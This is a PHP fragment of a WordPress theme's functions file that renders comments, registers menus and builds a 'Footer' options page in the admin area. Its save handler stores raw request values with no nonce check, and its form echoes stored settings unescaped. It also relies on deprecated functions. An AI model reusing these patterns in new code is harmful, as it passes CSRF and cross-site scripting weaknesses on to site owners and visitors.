<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
